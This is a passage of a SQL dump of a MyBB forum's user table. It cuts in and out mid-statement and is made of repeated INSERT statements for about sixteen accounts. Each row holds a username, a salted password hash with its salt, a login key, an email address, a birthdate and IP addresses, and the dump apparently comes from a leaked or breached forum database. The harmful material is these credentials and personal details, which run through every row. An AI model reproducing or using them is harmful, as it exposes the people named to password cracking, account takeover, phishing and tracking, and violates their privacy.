`longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('184', 'Homeless', '38255f6d048e42d591507efadfd1bc3f', 'nNyJeoAh', 'n8fChqoeYFQ4sOKaJg3IKW7U4npdYcUCSDpGAPoz3cNjaXNPeu', 'zieglerandrew@ymail.com', '1', '', '', '', '2', '', '0', '', '1347595690', '1347821473', '1347657126', '1347595892', '', '0', '', '', '', '24-2-1997', 'all', '', '0', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-5', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '75.48.249.244', '99.164.138.156', '1261500916', '1671727772', '', '494', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '1', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('187', 'hacking is stupid', 'a87663299a562c13cbe5ff6244604f55', '4UC1t2k2', '5Sm8pzS34eUONJUdokH5cQGcDBqJVXzmYfeWUpCZd4Uoiug2TP', 'igotleswag@hotmail.com', '0', '', '', '', '2', '', '0', '', '1347655320', '1347655471', '1347655320', '0', '', '0', '', '', '', '8-8-1993', 'all', '', '0', '0', '0', '0', '0', '0', '0', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '1', '2', '', '', '10', '0', '0', '0', '', '', '', '82', '0', '0', '75.34.59.228', '75.34.59.228', '1260534756', '1260534756', '', '151', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('188', 'Lonnie', '42ceee0ff70cb04cf3c379100a0aa04e', 'Aa3I36ZS', 'ySrHTSP1QwiJr77bv6lBkuXjrUNpMITYwDz9puS4FwEYEi4xSX', 'gekijyuken@gmail.com', '6', './uploads/avatars/avatar_188.jpg?dateline=1347677104', '120|125', 'upload', '2', '', '0', '', '1347665854', '1347928962', '1347924037', '1347924028', '', '0', '', '', '', '2-12-1990', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '82', '0', '0', '68.83.86.251', '68.83.86.251', '1146312443', '1146312443', '', '3733', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '1', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('185', 'Vohke', '5b868101b4e0e833db2288af11a60f1e', 'cIQ9xFCS', 'm54ctSPDyCdGyglGEMM2NMoyXb8YgkMQ8PSnNAm7PDqgpQ7dIY', 'diegonick1@live.com', '0', '', '', '', '2', '', '0', '', '1347652614', '1347652614', '1347652614', '0', '', '0', '', '', '', '7-4-1990', 'all', '', '0', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '82', '0', '0', '190.166.138.12', '', '-1096381940', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('189', 'venom19', '369ca7c15d35109febd4268a944edeb6', 'lE86Desn', 'j1gHiLJZWVUgMkLc7FDBnaqMMzrpRcaKuxCcO9AUwP9xlhfoYo', 'villa.jordi@gmail.com', '0', '', '', '', '2', '', '0', '', '1347739896', '1347742516', '1347739896', '0', '', '0', '', '', '', '31-8-1993', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '95.19.100.107', '95.19.100.107', '1595106411', '1595106411', '', '2649', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('190', 'Tropical', '68dc906683535f7397d38c433eb4de39', 'cHjjSVm4', 'DZlhjumWDmtIPPjxEoEVPFzjsdTW9HdgB3tkLSlBoECa5D2AIf', 'linda_rulz@live.ca', '0', '', '', '', '2', '', '0', '', '1347751435', '1347751457', '1347751457', '0', '', '0', '', '', '', '29-3-1993', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '82', '0', '0', '50.101.171.181', '50.101.171.181', '845523893', '845523893', '', '22', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '2', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('191', 'whodeypimp', 'df056e2e2cae67916438dee57fe26302', 'Wj4jHbAO', 'cNsqbHW6LA7FqvHIcl1QIi3bFTACPMDZ8HBorWKsnlM6WCo6TH', 'rayboy1995@aol.com', '0', '', '', '', '2', '', '0', '', '1347757658', '1347770311', '1347760705', '0', '', '0', '', '', '', '18-1-1992', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '24.190.244.64', '24.190.244.64', '415167552', '415167552', '', '1785', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('192', 'LiLViETGRL', '875c902cdfbd98ced56b7473941525d1', 'bE5ukjB1', '5BPKw4cehaqTNUCANVVDYTLO2EspJNJ5IRbRSNaC89I2fxjLfo', 'lilvietgirl4o8@yahoo.com', '0', '', '', '', '2', '', '0', '', '1347875268', '1347875371', '1347875268', '0', '', '0', '', '', '', '31-8-1988', 'all', '', '1', '1', '0', '1', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-7', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '24.6.164.63', '24.6.164.63', '403088447', '403088447', 'english', '103', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('193', 'Titan', '316455295c68c4c8f52d2c2cc3a215a0', 'l61AHV7G', 'FMGXGkCGHHykKwtkaGECDoE3NB8hgR6abjL5qjwk3lUmxMICfQ', 'teamgbz@gmail.com', '0', '', '', '', '2', '', '0', '', '1347894560', '1347894850', '1347894560', '0', '', '0', '', '', '', '9-1-1993', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '117.216.90.113', '117.216.90.113', '1977113201', '1977113201', '', '290', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('194', 'Slender Man', '04339cdad974fda9ff373f862e748b2c', '7vnI9PT8', 'ELanQfSoed6jiZYeiQ4cO33VHxVsu2aiUiAb7mvkW7zkUePvBM', 'thesyndicate2012@yahoo.com', '21', './uploads/avatars/avatar_194.jpg?dateline=1348112330', '113|150', 'upload', '2', '17', '0', '', '1348092775', '1351817794', '1351229431', '1349828988', '', '0', '', '', '', '28-11-1990', 'all', '[align=center][i]\"Music is like pie, once you get a taste you can\'t get enough\" - Me. :hehe:[/i][/align]', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '10', '99.108.180.49', '99.42.159.191', '1668068401', '1663737791', '', '14841', '1', '2', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '4', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('195', 'itsyoursite', '357f6aa5e6d33eaad2e6e34f7dac25b1', 'N6cSmSwq', 'lAtzaTfvDpB9oEklF3qFkzWp9YBV9M5UA4hWkOUqjqvc1UtoEc', 'tonyjabbour007@gmail.com', '0', '', '', '', '2', '', '0', '', '1348142449', '1348489757', '1348142868', '0', '', '0', '', '', '', '3-5-1993', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '141.105.95.20', '141.105.95.20', '-1922474220', '-1922474220', '', '705', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('196', '-CHLS-', 'a5a49854249309cf2f4ae64f10a77ed6', '8leHpVSb', 'bq6IkBRwFcLF6QPcMg2B47UKnCNWPlbNiOUiZhFI1JAxeo7u4C', 'royaldowns519@gmail.com', '0', '', '', '', '2', '', '0', '', '1348508133', '1349645700', '1348561844', '0', '', '0', '', '', '', '5-8-1988', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '1', '0', '0', '95.140.125.83', '95.140.125.83', '1603042643', '1603042643', '', '1307', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('197', 'sjox', 'b5cfb06e317d3a8223bd594d2dba3a71', '5vSDgMFW', 'C8BWyL2epquW74n45i1BNOVmnzyJz1YG5ViVLEozBpHbZLcuVp', 'sjorsuden@gmail.com', '0', '', '', '', '2', '', '0', '', '1348522388', '1348522469', '1348522388', '0', '', '0', '', '', '', '3-6-1986', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '84.31.88.238', '84.31.88.238', '1411340526', '1411340526', '', '81', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('198', 'Mr407', 'ad08e8d7ad93899fbbb2ef8d09fa3097', 'TnoOwqv6', '6GY4bV5S4dxUWf4z2pM4cb8Gb6pEcknpR4nDVqvYGVaAmQrbXb', 'cokeisgod@yahoo.com', '0', '', '', '', '2', '', '0', '', '1348535413', '1351734172', '1351668656', '1351668270', '', '0', '', '', '', '4-8-1990', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '68.204.185.63', '184.90.113.116', '1154267455', '-1202032268', '', '1328', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('199', 'Anonymous™', '587aae63e0eec24ad3bd3a7aa87d7a8b', 'QvidgYNE', 'nx7mOka6ZTUIczLOhLwSIt6T68pxeieLV8XqddL4uZizU5T96x', 'jagheterarn2@live.se', '52', './uploads/avatars/avatar_199.gif?dateline=1348716313', '108|135', 'upload', '2', '17', '17', '', '1348716179', '1352805208', '1352783645', '1351955868', '', '0', '', '', '', '10-11-1994', 'all', '[img]http://i.imgur.com/OZWG9.gif[/img]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '13', '85.230.50.38', '85.230.49.83', '1441149478', '1441149267', '', '29379', '1', '5', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '5', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, 